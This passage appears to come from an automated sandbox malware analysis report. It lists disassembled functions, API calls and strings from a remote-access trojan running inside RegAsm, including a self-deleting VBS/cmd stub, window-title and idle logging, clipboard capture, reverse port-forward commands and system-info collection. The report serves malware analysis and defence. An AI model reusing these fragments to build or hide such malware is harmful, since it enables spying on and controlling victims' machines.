                                  • _free.LIBCMT ref: 0045140F
                                  • _free.LIBCMT ref: 00451447
                                  • _free.LIBCMT ref: 0045144E
                                  • _free.LIBCMT ref: 0045146B
                                  • _free.LIBCMT ref: 00451483
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID:
                                  • API String ID: 161543041-0
                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                  Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                    • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                    • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                    • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                  • API String ID: 1913171305-3159800282
                                  • Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                  • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                  • Opcode Fuzzy Hash: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                  • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                  Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                  • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                  • Opcode Fuzzy Hash: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                  • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                  Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                  • GetLastError.KERNEL32 ref: 00455D6F
                                  • __dosmaperr.LIBCMT ref: 00455D76
                                  • GetFileType.KERNEL32(00000000), ref: 00455D82
                                  • GetLastError.KERNEL32 ref: 00455D8C
                                  • __dosmaperr.LIBCMT ref: 00455D95
                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                  • GetLastError.KERNEL32 ref: 00455F31
                                  • __dosmaperr.LIBCMT ref: 00455F38
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                  • String ID: H
                                  • API String ID: 4237864984-2852464175
                                  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                  Function 0044ACC9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                  • __freea.LIBCMT ref: 0044AEB0
                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                  • __freea.LIBCMT ref: 0044AEB9
                                  • __freea.LIBCMT ref: 0044AEDE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                  • String ID: PkGNG$tC
                                  • API String ID: 2597970681-4196309852
                                  • Opcode ID: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                  • Opcode Fuzzy Hash: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                  Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID: \&G$\&G$`&G
                                  • API String ID: 269201875-253610517
                                  • Opcode ID: 0a05fa7fafc3926735f9ff598043b48751ea8cfb3e4d07056946ce3260a8f3c6
                                  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                  • Opcode Fuzzy Hash: 0a05fa7fafc3926735f9ff598043b48751ea8cfb3e4d07056946ce3260a8f3c6
                                  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                  Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 65535$udp
                                  • API String ID: 0-1267037602
                                  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                  Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                  • String ID: [${ User has been idle for $ minutes }$]
                                  • API String ID: 911427763-3954389425
                                  • Opcode ID: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                  • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                  • Opcode Fuzzy Hash: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                  • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                  Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LongNamePath
                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                  • API String ID: 82841172-425784914
                                  • Opcode ID: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                  • Opcode Fuzzy Hash: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                  Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                  • __dosmaperr.LIBCMT ref: 0043A926
                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                  • __dosmaperr.LIBCMT ref: 0043A963
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                  • __dosmaperr.LIBCMT ref: 0043A9B7
                                  • _free.LIBCMT ref: 0043A9C3
                                  • _free.LIBCMT ref: 0043A9CA
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                  • String ID:
                                  • API String ID: 2441525078-0
                                  • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                  • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                  Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                  • TranslateMessage.USER32(?), ref: 0040557E
                                  • DispatchMessageA.USER32(?), ref: 00405589
                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                  • API String ID: 2956720200-749203953
                                  • Opcode ID: 39c70f7a9fb62d047285317ad68f4ff50d9b26878aa9747946ac0a7af0469701
                                  • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                  • Opcode Fuzzy Hash: 39c70f7a9fb62d047285317ad68f4ff50d9b26878aa9747946ac0a7af0469701
                                  • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                  Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                  • String ID: 0VG$0VG$<$@$Temp
                                  • API String ID: 1704390241-2575729100
                                  • Opcode ID: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                  • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                  • Opcode Fuzzy Hash: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                  • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                  Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenClipboard.USER32 ref: 0041697C
                                  • EmptyClipboard.USER32 ref: 0041698A
                                  • CloseClipboard.USER32 ref: 00416990
                                  • OpenClipboard.USER32 ref: 00416997
                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                  • CloseClipboard.USER32 ref: 004169BF
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                  • String ID: !D@
                                  • API String ID: 2172192267-604454484
                                  • Opcode ID: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                  • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                  • Opcode Fuzzy Hash: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                  • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                  Function 0041330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                  • String ID:
                                  • API String ID: 297527592-0
                                  • Opcode ID: 22386a43a60047858d5371973b5e3297a85e3cc3c05708fada6b2de72b5e662f
                                  • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                  • Opcode Fuzzy Hash: 22386a43a60047858d5371973b5e3297a85e3cc3c05708fada6b2de72b5e662f
                                  • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                  Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                  • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                  Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 004481B5
                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                  • _free.LIBCMT ref: 004481C1
                                  • _free.LIBCMT ref: 004481CC
                                  • _free.LIBCMT ref: 004481D7
                                  • _free.LIBCMT ref: 004481E2
                                  • _free.LIBCMT ref: 004481ED
                                  • _free.LIBCMT ref: 004481F8
                                  • _free.LIBCMT ref: 00448203
                                  • _free.LIBCMT ref: 0044820E
                                  • _free.LIBCMT ref: 0044821C
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                  Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Eventinet_ntoa
                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                  • API String ID: 3578746661-3604713145
                                  • Opcode ID: 10eb1960a8d8ce6813e19caa070b236760d69188d96698ceea7a474dae621fae
                                  • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                  • Opcode Fuzzy Hash: 10eb1960a8d8ce6813e19caa070b236760d69188d96698ceea7a474dae621fae
                                  • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                  Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DecodePointer
                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                  • API String ID: 3527080286-3064271455
                                  • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                  • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                  • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                  • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                  Function 0044B43C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                  • __fassign.LIBCMT ref: 0044B4F9
                                  • __fassign.LIBCMT ref: 0044B514
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B559
                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B592
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                  • String ID: PkGNG
                                  • API String ID: 1324828854-263838557
                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                  Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateDeleteExecuteShellSleep
                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                  • API String ID: 1462127192-2001430897
                                  • Opcode ID: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                  • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
